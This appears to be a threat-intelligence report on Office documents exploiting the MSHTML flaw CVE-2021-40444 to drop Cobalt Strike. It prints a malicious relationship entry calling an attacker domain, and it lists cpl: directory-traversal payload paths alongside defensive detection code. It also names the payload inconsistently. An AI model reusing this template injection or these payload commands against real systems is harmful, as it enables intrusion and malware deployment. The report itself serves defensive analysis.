Trident Campaign: Microsoft Office RCE Zero-day Exploitation Techniques and Mitigation Measures

Summary

Following several attacks targeting the RCE flaw in MSHTML, the CloudSEK Threat Intelligence Research team shares the TTPs and IOCs of the attack sequence.

Overview

The MSHTML (Microsoft HTML) engine, aka Trident, is a browser engine developed by Microsoft for Internet Explorer. The Microsoft Office suite supports MSHTML, and threat actors are abusing this to gain code execution on targeted systems. Attackers craft a malicious ActiveX control, which is then abused by a Microsoft Office document that hosts the browser rendering engine. They then persuade the victim to open this malicious document, which in turn triggers the logical flaw in MSHTML.

These malicious documents are delivered via Office 365. By default, documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against such attacks. However, if the user chooses to leave Protected View and load the content, bypassing these mitigation measures, the target machine is exploited and malware agents such as the Cobalt Strike Beacon are deployed.

Microsoft Defender for Endpoint has been updated to flag such attacks, displaying a warning note that reads: “Suspicious Cpl File Execution.” Based on the quality of the vulnerability research and the scale at which users are being targeted, it is most likely that an advanced adversary is responsible for the ongoing campaign.

The CloudSEK Threat Intelligence Research team has obtained malicious artifacts to retrieve the TTPs (Tactics, Techniques, and Procedures) used by the adversaries that leverage the MSHTML RCE bug, in order to provide better security for our clients. This report provides the technical analysis of the campaign. Specifics regarding the exploit for the vulnerability have been intentionally withheld to avoid misuse in the public domain, as a large number of systems continue to be susceptible.

Remote Template Injection Technique

Microsoft Word and Excel documents are zipped collections of XML files that retain the information and data the user provided while creating the document in the corresponding Office application. In simple words, one can unzip a .docx file to see the internal XML files that hold the content and various metadata. The directory word/_rels in the unzipped Word/Excel file plays a very significant role in weaponizing a seemingly benign document.

[Figure: The process by which users are attacked via the Trident vulnerability]
The directory ‘_rels’ stores relationship metadata, which tells Office where to fetch the template used by the document when it is loaded. An SMB address or HTTP URL of an asset controlled by the attacker can be supplied here to deliver a malicious payload. To detect the remote template injection vector, search for <Relationship> elements whose TargetMode attribute is set to "External". In the sample analysed here, the malicious URL that hosts the exploit code is supplied as the Target value of such a <Relationship> element. Office then downloads the file that the URL points to.

  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId8"/>
    <Relationship Target="webSettings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId3"/>
    <Relationship Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId7"/>
    <Relationship Target="settings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId2"/>
    <Relationship Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId1"/>
    <Relationship Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Id="rId6" TargetMode="External"/>
    <Relationship Target="media/image2.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/>
    <Relationship Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/>
  </Relationships>

Remote template injection used in the obtained Trident campaign samples

The malicious .docx sample, when opened, loads a webpage named ‘side.html’, hosted on an attacker-controlled server, via remote template injection. Since the campaign targets the MSHTML engine supported on Office platforms, loading the HTML document occurs naturally.
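A triage scanner for the relationship part described above, added here as an example rather than code from the original report: it walks the .rels parts of a docx/xlsx and flags External relationships whose Target uses a remote or mhtml: handler, the pattern seen in the campaign sample. The embedded .rels is constructed for the example and attacker.example is a placeholder host.

```python
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Target prefixes that pull content from outside the package (mhtml: is what this campaign uses).
REMOTE_TARGET = re.compile(r"^(mhtml:|https?://|file:|\\\\)", re.IGNORECASE)

# Constructed .rels part mirroring the campaign layout; attacker.example is a placeholder host.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
 <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
 <Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
  Target="mhtml:http://attacker.example/side.html!x-usc:http://attacker.example/side.html" TargetMode="External"/>
 <Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/>
</Relationships>"""

def scan_rels_xml(xml_text):
    """Return (Id, relationship kind, Target, reasons) for each suspicious external relationship."""
    findings = []
    for rel in ET.fromstring(xml_text).iter(REL_NS + "Relationship"):
        if rel.get("TargetMode", "Internal").lower() != "external":
            continue  # package-internal part such as styles.xml
        target = rel.get("Target", "")
        kind = rel.get("Type", "").rsplit("/", 1)[-1]
        reasons = []
        if REMOTE_TARGET.match(target):
            reasons.append("remote target")
        if target.lower().startswith("mhtml:") or "!x-usc:" in target.lower():
            reasons.append("mhtml handler forces MSHTML to load")
        if kind in ("oleObject", "attachedTemplate"):
            reasons.append("external " + kind)
        if reasons:
            findings.append((rel.get("Id"), kind, target, reasons))
    return findings

def scan_docx(docx):
    """Scan every .rels part of a docx/xlsx (path or file-like object); returns {part: findings}."""
    results = {}
    with zipfile.ZipFile(docx) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                hits = scan_rels_xml(zf.read(name))
                if hits:
                    results[name] = hits
    return results
```

Run scan_docx("suspect.docx") on a quarantined file; a hit on an oleObject or attachedTemplate relationship with an mhtml: Target is the strongest indicator of this technique.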

Exploitation 

The malicious webpage ‘side.html’ fetched by the document contains heavily obfuscated JavaScript code that exploits the CVE-2021-40444 vulnerability, which has no official patch at the time of writing this report. Execution of this phase leads to retrieval of the final payload for command and control.
HTML contents of the malicious webpage ‘side.html’
Analysis of the exploit code after deobfuscating the JavaScript gives us a fair idea of the complete exploitation process. Considering the sensitive nature of the issue, this report does not cover details of the vulnerability.

A section of the deobfuscated exploit code is shown below. The attacker reaches the vulnerability through ActiveXObject to gain code execution. The code reaches out to the attacker's server that hosts the final payload. The file ‘ministry.cab’ is a Windows cabinet file, an archive format very similar to ZIP, and it contains the Cobalt Strike beacon in the form of a CPL file that masquerades as an INF file.

A section of the deobfuscated exploit code
The cabinet file is retrieved from a remote URL, and the INF file is stored in one of the directories listed in the image below. The exploit code abuses directory traversal to execute the Cobalt Strike CPL beacon, which masquerades as ‘champion.inf’.

A section of the deobfuscated exploit code

The CPL payload ‘champion.inf’ is eventually executed by ‘rundll32.exe’ with the following argument:

  .cpl:../../../AppData/Local/Temp/Low/championship.inf

Cobalt Strike Beacon

Basic image analysis shows that the ‘champion.inf’ file is, in fact, a 64-bit DLL (Dynamic Link Library): its first bytes are the “MZ” signature. A CPL file is a Control Panel item that has code execution capabilities. A DLL becomes a CPL when it exports a particular function called ‘CplApplet’, and it can then be readily executed like any PE (Portable Executable).

Image analysis of ‘champion.inf’
Windows Defender flags this file as “Trojan:Win32/Agent.SA”, and other security solutions flag it as “Trojan.Win64.COBEACON.SUZ”.

Dynamic Analysis of the Exploit

When the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed as a result is a Cobalt Strike beacon, as discussed above. CloudSEK researchers recreated the exploit code and ran it to get a better understanding of the vulnerability. The researchers used Process Monitor to analyse the execution flow of the Office document (WINWORD.EXE) and found a few interesting results, which are shared below.
Loading of Vulnerable Module 
The Microsoft Word application loads mshtml.dll from the Windows directory. The vulnerability resides in one of the functionalities defined in this DLL.

DLL files loaded from the Windows directory

Based on CloudSEK’s testing, mshtml.dll is not loaded into WINWORD.EXE by default. When the attacker delivers an exploit written in HTML via remote template injection, the handler given in the <Relationship> Target is mhtml:. This causes the mshtml module to be loaded into the Word application to render the HTML page within the Word document.
File Writing 
The final payload championship.inf is extracted from the initial ministry.cab archive file and written to the Temp directory. This is probably caused by the vulnerability, which adversaries abuse to write user-controlled data to disk.
Code Execution 
CloudSEK researchers also identified multiple control.exe processes that are spawned to execute the given CPL payload. Each of these processes searches for the championship.inf file in directories that are hardcoded in the exploit. Here is the list of hardcoded paths to which the payload is dropped:
cpl:../../../AppData/Local/Temp/Low/championship.inf
.cpl:../../../AppData/Local/Temp/championship.inf
cpl:../../../../AppData/Local/Temp/Low/championship.inf
cpl:../../../../AppData/Local/Temp/championship.inf
.cpl:../../../../../Temp/Low/championship.inf
.cpl:../../../../../Temp/championship.inf
.cpl:../../Low/championship.inf
.cpl:../../championship.inf
The command lines provided to control.exe are shown in the image below. The argument is the location of the final payload, which is eventually executed by rundll32.
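A process-creation detection for the control.exe/rundll32 behaviour described above, added here as an example and not part of the original report: it flags command lines that pass a cpl: or .cpl: argument with ../ traversal to the Control Panel handler, scores a non-.cpl payload extension and an Office parent as extra reasons, and returns the findings. The events are constructed for the example (the shell32.dll,Control_RunDLL form is the standard way control.exe hands off to rundll32), not real telemetry.

```python
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "parent image cmdline")

# Constructed process-creation events (not real telemetry); the paths follow the hardcoded list above.
EVENTS = [
    ProcEvent("WINWORD.EXE", "control.exe",
              r'control.exe ".cpl:../../../AppData/Local/Temp/Low/championship.inf"'),
    ProcEvent("control.exe", "rundll32.exe",
              r'rundll32.exe shell32.dll,Control_RunDLL "cpl:../../../../AppData/Local/Temp/championship.inf"'),
    ProcEvent("explorer.exe", "control.exe", r'control.exe "C:\Windows\System32\timedate.cpl"'),
]

# "cpl:" or ".cpl:" followed by at least one "../" (or "..\") hop, then the payload path.
CPL_TRAVERSAL = re.compile(r'\.?cpl:((?:\.\./|\.\.\\)+[^"\s]+)', re.IGNORECASE)
OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}

def classify(event):
    """Return a finding dict for a suspicious control.exe/rundll32 command line, else None."""
    m = CPL_TRAVERSAL.search(event.cmdline)
    if not m:
        return None  # ordinary Control Panel launch, e.g. timedate.cpl by full path
    rel_path = m.group(1).replace("\\", "/")
    reasons = ["cpl: handler with directory traversal"]
    ext = rel_path.rsplit(".", 1)[-1].lower()
    if ext != "cpl":
        reasons.append("CPL payload masquerading as ." + ext)
    if event.parent.upper() in OFFICE_APPS:
        reasons.append("spawned by " + event.parent)
    return {"image": event.image, "payload": rel_path, "reasons": reasons}

def scan_events(events):
    """Apply classify() to a batch of events and keep only the hits."""
    return [hit for hit in map(classify, events) if hit]
```

The same regex maps directly onto a Sysmon Event ID 1 or EDR process-creation rule on the CommandLine field; the Office-parent condition is what separates this campaign from benign Control Panel use.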

Guidelines

Based on the official guidelines posted by Microsoft, Windows users should follow the instructions given below:
  • Disable ActiveX via Group Policy*
  • Disable ActiveX on individual systems via registry
  • Disable shell preview in Windows Explorer
  • Enterprise customers who manage updates should select the detection build 1.349.22.0
  *Disabling ActiveX on Windows systems will have side effects depending on the user environment. For detailed information, refer to the official documentation issued by Microsoft.  

Indicators of Compromise (IOCs)


References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
